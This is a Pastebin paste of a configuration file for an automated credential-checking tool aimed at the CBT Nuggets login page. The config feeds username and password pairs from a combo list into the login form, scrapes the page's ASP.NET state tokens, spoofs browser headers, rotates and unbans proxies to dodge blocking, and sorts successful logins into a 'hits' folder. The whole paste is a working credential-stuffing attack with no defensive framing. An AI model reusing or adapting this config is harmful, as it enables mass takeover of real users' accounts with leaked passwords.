Advertisement
Guest User

Untitled

a guest
Jun 24th, 2018
164
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.80 KB | None | 0 0
  1. [General]
  2. UseProxy = True
  3. UseGlobalKeywords = False
  4. DefaultTimeout = 15
  5. UnbanAllProxiesWhenAllBannedAfter = 5.0
  6. HitsFolderName = cbtnugget
  7. Debug = True
  8. [Stage-1]
  9. Condition = Any
  10. Variable-1 = $Link = "https://www.cbtnuggets.com/login"
  11. Link = $Link#
  12. isFTP = False
  13. HTTPVersion = 1.1
  14. FollowRedirect = True
  15. HTTPRequestMethod = Post
  16. Timeout = 20
  17. Variable-2 = $validation = findtagval($Stage1ResponseSource#,"<input type=chr(double quotes)hiddenchr(double quotes) name=chr(double quotes)__EVENTVALIDATIONchr(double quotes) id=chr(double quotes)__EVENTVALIDATIONchr(double quotes) value=chr(double quotes)","chr(double quotes)")
  18. Variable-3 = $Heads = "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\ncontent-type: application/x-www-form-urlencoded\nreferer: https://www.cbtnuggets.com/login\nupgrade-insecure-requests: 1\nuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\n"
  19. Headers = $Heads#
  20. Variable-4 = $viewstate = findtagval($Stage1ResponseSource#,"<input type=chr(double quotes)hiddenchr(double quotes) name=chr(double quotes)__VIEWSTATEchr(double quotes) id=chr(double quotes)__VIEWSTATEchr(double quotes) value=chr(double quotes)","chr(double quotes)")
  21. Variable-5 = $PostContent = combinetext("__EVENTTARGET=ctl00%24PageContentPlaceHolder%24LoginAction&__EVENTARGUMENT=&__VIEWSTATE=",$viewstate#,"&__EVENTVALIDATION=",$validation#,"&ctl00%24PageContentPlaceHolder%24username=",$combousername#,"&ctl00%24PageContentPlaceHolder%24passwordPass=",$combopassword#)
  22. PostContent = $PostContent#
  23. Variable-6 = $IndexOfFailKey = indexof($Stage1ResponseSource#,"Forgot your password?")
  24. Failure-Condition = $IndexOfFailKey# >= 0
  25. Variable-7 = $IndexOfSuccessKey2 = indexof($Stage1ResponseSource#,"Sign Out")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement